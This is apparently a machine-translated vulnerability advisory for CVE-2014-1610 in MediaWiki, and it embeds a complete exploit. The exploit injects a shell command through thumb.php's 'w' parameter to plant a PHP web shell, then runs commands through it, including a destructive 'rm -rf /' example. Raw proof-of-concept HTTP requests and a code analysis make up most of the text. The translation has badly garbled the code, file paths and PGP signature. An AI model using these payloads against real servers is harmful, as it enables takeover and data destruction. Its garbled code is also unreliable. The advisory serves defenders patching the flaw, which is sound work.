Multiple Remote Code Execution Vulnerabilities in MediaWiki
Release date:
Updated on:
Affected Systems:
MediaWiki <= 1.22.1
Description:
--------------------------------------------------------------------------------
Bugtraq id: 65223
CVE (CAN) ID: CVE-2014-1610
MediaWiki is a famous wiki program running in the PHP + MySQL environment.
MediaWiki 1.22.2, 1.21.5, 1.19.11, and earlier versions enable support for DjVu or PDF File Upload, allowing remote attackers to use the supported des/media/DjVu. shell metacharacters and thumb in the page parameter in php. the shell metacharacters in the w parameter in php, And the deldes/media/Bitmap. parameters in php, uplodes/media/ImageHandler. attackers can exploit this vulnerability to execute arbitrary commands in php.
<* Source: Netanel Rubin
Link: http://secunia.com/advisories/56695
Http://www.exploit-db.com/exploits/31329/
*>
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
----- Begin pgp signed message -----
Hash: SHA1
######################################## ############################
#
# MediaWiki <= 1.22.1 unzip Handler Remote Code Execution Exploit (CVE-2014-1610)
# Reported by Netanel Rubin-Check Point's Vulnerability Research Group (Jan 19,201 4)
# Fixed in 1.22.2, 1.21.5 and 1.19.11 (Jan 30,201 4)
# Affected website: Wikipedia.org and more!
#
# Exploit author: Xelenonz & @ u0x (Pichaya Morimoto)
# Release dates: Feb 1, 2014
# Special Thanks to 2600 Thailand!
#
######################################## ############################
# Exploit:
######################################## ############################
1. upload Longcat.pdf to wikimedia cms site (with PDF Handler enabled)
Http: // vulnerable-site/index. php/Special: Upload
2. inject OS cmd to upload a php-backdoor
Http: // vulnerable-site/thumb. php? F=Longcat.pdf & w = 10 | 'echo % 20
"<? Php % 20 system (\ $ _ GET [1]); "> images/xnz. php'
3. access to php-backdoor!
Http: // vulnerable-site/images/xnz. php? 1 = rm % 20-rf % 20% 2f % 20 -- no-preserve-root
4. happy pwning !!
# Related files:
######################################## ############################
Thumb. php <-- extract all _ GET array to params
/Extensions/login handler/login handler_body.php <-- failed to escape w/width
Options
/Uplodes/media/ImageHandler. php
/Shortdes/GlobalFunctions. php
/Shortdes/filerepo/file/File. php
# Vulnerability Analysis:
######################################## ############################
1. thumb. php
This script used to resize images if it is configured to be done
When the web browser requests the image
<? ...
1.1 Called directly, use $ _ GET params
WfThumbHandleRequest ();
1.2 Handle a thumbnail request via query parameters
Function wfThumbHandleRequest (){
$ Params = get_magic_quotes_gpc ()
? Array_map ('stripslashes', $ _ GET)
: $ _ GET; <WTF
WfStreamThumb ($ params); // stream the thumbnail
}
1.3 Stream a thumbnail specified by parameters
Function wfStreamThumb (array $ params ){
...
$ FileName = isset ($ params ['F'])? $ Params ['F']: ''; // <puts
Uploaded.pdf file here
...
// Backwards compatibility parameters
If (isset ($ params ['W']) {
$ Params ['width'] = $ params ['W']; // <Inject OS cmd here!
Unset ($ params ['W']);
}
...
$ Img = wfLocalFile ($ fileName );
...
// Thumbnail isn't already there, so create the new thumbnail...
$ Thumb = $ img-> transform ($ params, File: RENDER_NOW); // <resize image
By width/height
...
// Stream the file if there were no errors
$ Thumb-> streamFile ($ headers );
...
?>
2./shortdes/filerepo/file/File. php
<? ...
Function transform ($ params, $ flags = 0 ){...
$ Handler = $ this-> getHandler (); // <PDF Handler
...
$ NormalisedParams = $ params;
$ Handler-> normaliseParams ($ this, $ normalisedParams );
...
$ Thumb = $ handler-> doTransform ($ this, $ tmpThumbPath, $ thumbUrl, $ params );
..
?>
3./extensions/export handler/export handler_body.php
<? ...
Function doTransform ($ image, $ dstPath, $ dstUrl, $ params, $ flags = 0 ){
...
$ Width = $ params ['width'];
...
$ Cmd = '('. wfEscapeShellArg ($ wg1_processor); // <craft shell cmd &
Parameters
$ Cmd. = "-sDEVICE = jpeg-sOutputFile =-dFirstPage = {$ page}
-DLastPage = {$ page }";
$ Cmd. = "-r {$ wg‑handlerdpi}-dBATCH-dNOPAUSE-q". wfEscapeShellArg (
$ SrcPath );
$ Cmd. = "|". wfEscapeShellArg ($ wg1_postprocessor );
$ Cmd. = "-depth 8-resize {$ width}-"; // <FAILED to escape shell
Argument
$ Cmd. = wfEscapeShellArg ($ dstPath ).")";
$ Cmd. = "2> & 1 ";
...
$ Err = wfShellExec ($ cmd, $ retval );
...
?>
4./shortdes/GlobalFunctions. php
Execute a shell command, with time and memory limits
<? ...
Function wfShellExec ($ cmd, & $ retval = null, $ environ = array (), $ limits =
Array ()){
...
Passthru ($ cmd, $ retval); // <Execute here !!
# Proof-Of-Concept
######################################## ############################
GET/mediawiki1221/thumb. php? F=longcat.pdf & w = 10 | 'echo % 20% 22% 3C
Php % 20 system (\ $ _ GET [1]); % 22% 3 Eimages/longcat. php'
HTTP/1.1
Host: 127.0.0.1
Connection: keep-alive
Accept:
Text/html, application/xhtml + xml, application/xml; q = 0.9, image/webp, */*; q = 0.8
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US, en; q = 0.8
Cookie: my_wikiUserID = 2; my_wikiUserName = Longcat;
My_wiki_session = op3h2huvddnmg7gji0pscfsg02
<Html> <Body>
<H1> Error generating thumbnail <P>
& #3648; & #3585; & #3636; & #3604; & #3611; & #3633; & #3597; & #3627; & #3634; & #3652; & #3617; & #3656; & #3626; & #3634; & #3617; & #3634; & #3619; & #3606; & #3607; & #3635; & #3619; & #3641; & #3611; & #3618; & #3656; & #3629; & #3652; & #3604; & #3657 ;: /bin/bash:-: command not found <br/>
Convert: option requires an argument '-resize '@
Error/convert. c/ConvertImageCommand/2380. <br/>
GPL Ghostscript 9.10: Unrecoverable error, exit code 1 <br/>
</P>
</Body>
</Html>
GET/mediawiki1221/images/longcat. php? 1 = id HTTP/1.1
Host: 127.0.0.1
Connection: keep-alive
Accept:
Text/html, application/xhtml + xml, application/xml; q = 0.9, image/webp, */*; q = 0.8
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US, en; q = 0.8
Cookie: my_wikiLoggedOut = 1391266363; my_wikiUserID = 2;
My_wikiUserName = Longcat; my_wiki_session = bv1_n4o0sn6ug04lg26luqfcg1
Uid = 33 (www-data) gid = 33 (www-data) groups = 33 (www-data)
# Back-end $ cmd
######################################## ############################
GlobalFunctions. php: wfShellExec ()
Cmd = ('gs '-sDEVICE = jpeg-sOutputFile =--dFirstPage = 1-dLastPage = 1-r150
-DBATCH-dNOPAUSE-q '/var/www/mediawiki1221/images/2/27/Longcat.pdf' |
'/Usr/bin/convert'-depth 8-resize 10 | 'echo "<? Php
System (\ $ _ GET [1]); "> images/longcat. php '-
'/Tmp/transform_0e377aad0e27-1.jpg') 2> & 1
----- Begin pgp signature -----
Version: GnuPG v1.4.14 (GNU/Linux)
Iqicbaebagbqjs7sllaaojeb2khapd1xmu8bcp/A + hMUw/EDwChN + 2 XjtExVGU
BzPrpXXBbp6WGWkeztmrT78Y1b1lXX/cQA4V9IGrdHUEdgG0p3y476d7eZ5sPxVf
Ny9Xg7o4WtMgmSvSOOc + lCsy9aAKab801cs1HLbwZokwK8ItwQQoGfik0BgNQ4l1
MijELis1z1f3k6yJ9/OJicnIJDmHIzPL9wQyr2A5c + jjz74SR // SlQPrqDbvEpj2
UCCpTpjf6LGYCzyGmqROlf + OxFTeXdB9oghButrEtQ9w6qGQg1/UZjmbx/xLkCqb
Bytes
Bytes
FXbhL9O2u/bqiabQKnsJ6bx8hcm2a9mO +/yjzuybxybhrjserd4l1_wuyr/WPAQt
VuICIQyO5pcjkIib + 0DN4e7xcFMYuo3o6WkSZuZT + l0LwYDVmhUbaGAEP13 + dWZZ
Bytes
KumwDlzYP/301fsKGLtfsnUmK2qkj1EF3DVoJbZ5VFdgiUSlCMsbp9qdGfUPbelR
2LmeyQR2rzjBB7Sovvcn
= OoEs
----- End pgp signature -----
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
MediaWiki
---------
The vendor has released a patch to fix this security problem. Please download it from the vendor's homepage:
Http://wikipedia.sourceforge.net/
Http://lists.wikimedia.org/pipermail/mediawiki-announce/2014-January/000140.html
Https://www.mediawiki.org/wiki/Release_notes/1.22
Https://www.mediawiki.org/wiki/Release_notes/1.21
Https://www.mediawiki.org/wiki/Release_notes/1.19